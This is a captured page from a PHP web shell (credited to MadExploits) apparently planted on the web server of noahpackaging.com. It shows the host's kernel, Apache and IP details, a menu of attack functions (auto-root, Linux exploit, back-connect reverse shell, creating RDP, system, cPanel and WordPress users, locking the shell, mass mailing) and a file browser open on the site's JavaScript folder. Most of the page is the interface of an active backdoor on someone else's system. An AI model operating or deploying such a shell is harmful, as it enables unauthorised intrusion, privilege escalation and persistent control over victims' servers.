Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.190.2
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
noahpackaging.com /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap.native-master
[ DIR ]
drwxr-xr-x
own-carousel-1.0.0
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
blog.js
120
B
-rw-r--r--
bootstrap.bundle.min.js
77.74
KB
-rw-r--r--
bootstrap.min.js
61.98
KB
-rw-r--r--
category_page.js
184
B
-rw-r--r--
chart-main.js
1.74
KB
-rw-r--r--
check_overflow.js
2.36
KB
-rw-r--r--
custom.js
4.19
KB
-rw-r--r--
demo-4.js
15.42
KB
-rw-r--r--
detail_page.js
0
B
-rw-r--r--
easyzoom.js
3.98
KB
-rw-r--r--
gtag.js
0
B
-rw-r--r--
head.js.php
209
B
-rw-r--r--
home_scripts.js
3.14
KB
-rw-r--r--
jquery-3.6.js
126.34
KB
-rw-r--r--
jquery.js
86.76
KB
-rw-r--r--
lightslider.js
46.96
KB
-rw-r--r--
main.js
40.29
KB
-rw-r--r--
owl.carousel.min.js
42.92
KB
-rw-r--r--
popper.min.js
20.76
KB
-rw-r--r--
script.js
599
B
-rw-r--r--
showmoreless.js
6.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : chart-main.js
(function($) { "use strict"; var ctx = document.getElementById("growthChart").getContext('2d'); var myChart = new Chart(ctx, { type: 'line', data: { labels: ["Jan 21", "Feb 21", "Mar 21", "Apr 21", "May 21", "Jun 21", "Jul 21", "Aug 21", "Sep 12", "Oct 21"], datasets: [{ label: 'Uploads', // Name the series data: [2, 50, 45, 65, 63, 56, 50, 35, 28, 45], // Specify the data values array fill: false, borderColor: '#2196f3', // Add custom color border (Line) backgroundColor: '#2196f3', // Add custom color background (Points and Fill) borderWidth: 1 // Specify bar border width }, { label: 'Earnings', data: [20, 58, 32, 78, 56, 89, 87, 96, 92, 100], fill: false, borderColor: '#ff6191', backgroundColor: '#ff6191', borderWidth: 1 }, { label: 'Sales', data: [20, 25, 10, 35, 45, 32, 78, 56, 89, 87], fill: false, borderColor: '#33317d', backgroundColor: '#33317d', borderWidth: 1 }, { label: 'Returns', data: [2, 7, 4, 10, 5, 3, 2, 8, 3, 4], fill: false, borderColor: '#f79165', backgroundColor: '#f79165', borderWidth: 1 }] }, options: { responsive: true, // Instruct chart js to respond nicely. maintainAspectRatio: false, // Add to prevent default behaviour of full-width/height } }); })(jQuery);
Close